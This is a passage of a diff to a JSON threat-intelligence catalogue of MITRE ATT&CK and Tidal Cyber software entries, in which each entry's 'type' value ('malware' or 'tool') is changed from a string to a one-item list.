"S0597", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11175,7 +11779,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11205,7 +11811,9 @@ "tags": [ "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11250,7 +11858,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -11272,7 +11882,9 @@ "tags": [ "16b47583-1c54-431f-9f09-759df7b5ddb7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11292,7 +11904,9 @@ ], "software_attack_id": "S5077", "source": "Tidal Cyber", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11311,7 +11925,9 @@ ], "software_attack_id": "S0237", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11333,7 +11949,9 @@ ], "software_attack_id": "S0690", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11352,7 +11970,9 @@ ], "software_attack_id": "S0342", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11378,7 +11998,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11404,7 +12026,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11432,7 +12056,9 @@ ], "software_attack_id": "S5079", "source": "Tidal Cyber", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11454,7 +12080,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -11496,7 +12124,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11515,7 +12145,9 @@ ], "software_attack_id": "S0132", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11531,7 +12163,9 @@ "meta": { "software_attack_id": "S0047", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11547,7 +12181,9 @@ "meta": { "software_attack_id": "S0151", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11601,7 +12237,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11649,7 +12287,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11669,7 +12309,9 @@ "meta": { "software_attack_id": "S0214", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11692,7 +12334,9 @@ ], "software_attack_id": "S0246", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11712,7 +12356,9 @@ "meta": { "software_attack_id": "S0224", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -11735,7 +12381,9 @@ ], "software_attack_id": "S0391", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11754,7 +12402,9 @@ ], "software_attack_id": "S0071", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11791,7 +12441,9 @@ ], "software_attack_id": "S0061", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11826,7 +12478,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11852,7 +12506,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11906,7 +12562,9 @@ "tags": [ "2e621fc5-dea4-4cb9-987e-305845986cd3" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11936,7 +12594,9 @@ "tags": [ "e809d252-12cc-494d-94f5-954c49eb87ce" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11958,7 +12618,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12003,7 +12665,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -12022,7 +12686,9 @@ ], "software_attack_id": "S0394", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12044,7 +12710,9 @@ "tags": [ "1efd43ee-5752-49f2-99fe-e3441f126b00" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12067,7 +12735,9 @@ ], "software_attack_id": "S0009", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12096,7 +12766,9 @@ "4fa6f8e1-b0d5-4169-8038-33e355c08bde", "8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12122,7 +12794,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12141,7 +12815,9 @@ ], "software_attack_id": "S0232", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12164,7 +12840,9 @@ ], "software_attack_id": "S0376", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12191,7 +12869,9 @@ ], "software_attack_id": "S0431", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12232,7 +12912,9 @@ "tags": [ "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -12291,7 +12973,9 @@ ], "software_attack_id": "S0070", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12326,7 +13010,9 @@ ], "software_attack_id": "S0068", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12475,7 +13161,9 @@ ], "software_attack_id": "S0203", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12545,7 +13233,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12568,7 +13258,9 @@ ], "software_attack_id": "S0537", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12591,7 +13283,9 @@ ], "software_attack_id": "S1022", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12613,7 +13307,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12662,7 +13358,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -12703,7 +13401,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -12743,7 +13443,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -12783,7 +13485,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -12824,7 +13528,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -12840,7 +13546,9 @@ "meta": { "software_attack_id": "S0101", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -12873,7 +13581,9 @@ ], "software_attack_id": "S0278", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -12918,7 +13628,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -12959,7 +13671,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -12981,7 +13695,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -13026,7 +13742,9 @@ "4d767e87-4cf6-438a-927a-43d2d0beaab7", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -13132,7 +13850,9 @@ "tags": [ "37dff778-95a6-4e51-a26a-1d399ef713be" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -13163,7 +13883,9 @@ "tags": [ "37dff778-95a6-4e51-a26a-1d399ef713be" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -13207,7 +13929,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -13226,7 +13950,9 @@ ], "software_attack_id": "S0259", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -13267,7 +13993,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -13307,7 +14035,9 @@ "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", "15787198-6c8b-4f79-bf50-258d55072fee" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -13326,7 +14056,9 @@ ], "software_attack_id": "S0260", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -13342,7 +14074,9 @@ "meta": { "software_attack_id": "S0231", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -13366,7 +14100,9 @@ ], "software_attack_id": "S5080", "source": "Tidal Cyber", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -13391,7 +14127,9 @@ "cd1b5d44-226e-4405-8985-800492cf2865", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -13477,7 +14215,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -13503,7 +14243,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -13526,7 +14268,9 @@ ], "software_attack_id": "S0015", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -13556,7 +14300,9 @@ "f01290d9-7160-44cb-949f-ee4947d04b6f", "cd1b5d44-226e-4405-8985-800492cf2865" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -13575,7 +14321,9 @@ ], "software_attack_id": "S0163", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -13594,7 +14342,9 @@ ], "software_attack_id": "S0528", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -13614,7 +14364,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -13720,7 +14472,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -13767,7 +14521,9 @@ ], "software_attack_id": "S0201", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -13922,7 +14678,9 @@ "tags": [ "16b47583-1c54-431f-9f09-759df7b5ddb7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14003,7 +14761,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -14026,7 +14786,9 @@ "84615fe0-c2a5-4e07-8957-78ebc29b4635", "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14049,7 +14811,9 @@ ], "software_attack_id": "S0215", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14075,7 +14839,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14098,7 +14864,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14124,7 +14892,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14147,7 +14917,9 @@ ], "software_attack_id": "S0487", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14166,7 +14938,9 @@ ], "software_attack_id": "S1020", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14189,7 +14963,9 @@ ], "software_attack_id": "S0387", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14226,7 +15002,9 @@ ], "software_attack_id": "S0276", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14249,7 +15027,9 @@ ], "software_attack_id": "S0271", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14287,7 +15067,9 @@ ], "software_attack_id": "S1051", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14314,7 +15096,9 @@ ], "software_attack_id": "S0526", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14412,7 +15196,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14464,7 +15250,9 @@ "efa33611-88a5-40ba-9bc4-3d85c6c8819b", "8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14483,7 +15271,9 @@ ], "software_attack_id": "S0437", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14506,7 +15296,9 @@ ], "software_attack_id": "S0250", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -14541,7 +15333,9 @@ ], "software_attack_id": "S0641", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14560,7 +15354,9 @@ ], "software_attack_id": "S0669", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14583,7 +15379,9 @@ ], "software_attack_id": "S0162", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14606,7 +15404,9 @@ ], "software_attack_id": "S0156", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14632,7 +15432,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14651,7 +15453,9 @@ ], "software_attack_id": "S1075", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14674,7 +15478,9 @@ ], "software_attack_id": "S0236", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14719,7 +15525,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -14752,7 +15560,9 @@ "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", "dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -14846,7 +15656,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -14880,7 +15692,9 @@ "173e1480-8d9b-49c5-854d-594dde9740d6", "311abf64-a9cc-4c6a-b778-32c5df5658be" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [], "uuid": "d5d79a51-3756-40de-81cd-4dac172fbb74", @@ -14932,7 +15746,9 @@ "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", "e727eaa6-ef41-4965-b93a-8ad0c51d0236" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -14963,7 +15779,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -14997,7 +15815,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -15016,7 +15836,9 @@ ], "software_attack_id": "S0211", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15043,7 +15865,9 @@ "b20e7912-6a8d-46e3-8e13-9a3fc4813852", "70dc52b0-f317-4134-8a42-71aea1443707" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15065,7 +15889,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15088,7 +15914,9 @@ ], "software_attack_id": "S0680", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15131,7 +15959,9 @@ "84615fe0-c2a5-4e07-8957-78ebc29b4635", "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15192,7 +16022,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15219,7 +16051,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15265,7 +16099,9 @@ "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", "e727eaa6-ef41-4965-b93a-8ad0c51d0236" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -15295,7 +16131,9 @@ "tags": [ "1efd43ee-5752-49f2-99fe-e3441f126b00" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15321,7 +16159,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15344,7 +16184,9 @@ ], "software_attack_id": "S0582", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15374,7 +16216,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -15397,7 +16241,9 @@ "tags": [ "a2e000da-8181-4327-bacd-32013dbd3654" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15416,7 +16262,9 @@ ], "software_attack_id": "S0042", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15442,7 +16290,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -15465,7 +16315,9 @@ ], "software_attack_id": "S0532", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15498,7 +16350,9 @@ ], "software_attack_id": "S0010", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15539,7 +16393,9 @@ ], "software_attack_id": "S0409", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15594,7 +16450,9 @@ ], "software_attack_id": "S1016", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15621,7 +16479,9 @@ ], "software_attack_id": "S1048", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15640,7 +16500,9 @@ ], "software_attack_id": "S0282", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15659,7 +16521,9 @@ ], "software_attack_id": "S1060", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15684,7 +16548,9 @@ ], "software_attack_id": "S0413", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -15734,7 +16600,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -15783,7 +16651,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -15805,7 +16675,9 @@ "tags": [ "16b47583-1c54-431f-9f09-759df7b5ddb7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15828,7 +16700,9 @@ ], "software_attack_id": "S0167", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15873,7 +16747,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -15902,7 +16778,9 @@ "a2e000da-8181-4327-bacd-32013dbd3654", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15925,7 +16803,9 @@ ], "software_attack_id": "S0500", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -15948,7 +16828,9 @@ ], "software_attack_id": "S0459", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -15976,7 +16858,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16000,7 +16884,9 @@ "tags": [ "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -16027,7 +16913,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16059,7 +16947,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -16090,7 +16980,9 @@ ], "software_attack_id": "S0530", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16109,7 +17001,9 @@ ], "software_attack_id": "S0443", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16132,7 +17026,9 @@ ], "software_attack_id": "S1059", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16172,7 +17068,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16203,7 +17101,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "e81ba503-60b0-4b64-8f20-ef93e7783796" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16222,7 +17122,9 @@ ], "software_attack_id": "S0688", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16262,7 +17164,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -16284,7 +17188,9 @@ "tags": [ "16b47583-1c54-431f-9f09-759df7b5ddb7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16325,7 +17231,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -16366,7 +17274,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -16402,7 +17312,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16443,7 +17355,9 @@ "dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -16669,7 +17583,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -16689,7 +17605,9 @@ "meta": { "software_attack_id": "S0133", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16711,7 +17629,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16737,7 +17657,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16760,7 +17682,9 @@ ], "software_attack_id": "S0083", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16779,7 +17703,9 @@ ], "software_attack_id": "S0084", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16798,7 +17724,9 @@ ], "software_attack_id": "S0080", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16843,7 +17771,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -16859,7 +17789,9 @@ "meta": { "software_attack_id": "S0079", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16885,7 +17817,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16911,7 +17845,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16934,7 +17870,9 @@ ], "software_attack_id": "S0149", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -16998,7 +17936,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -17041,7 +17981,9 @@ ], "software_attack_id": "S1047", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -17067,7 +18009,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -17111,7 +18055,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -17152,7 +18098,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -17193,7 +18141,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -17234,7 +18184,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -17275,7 +18227,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + 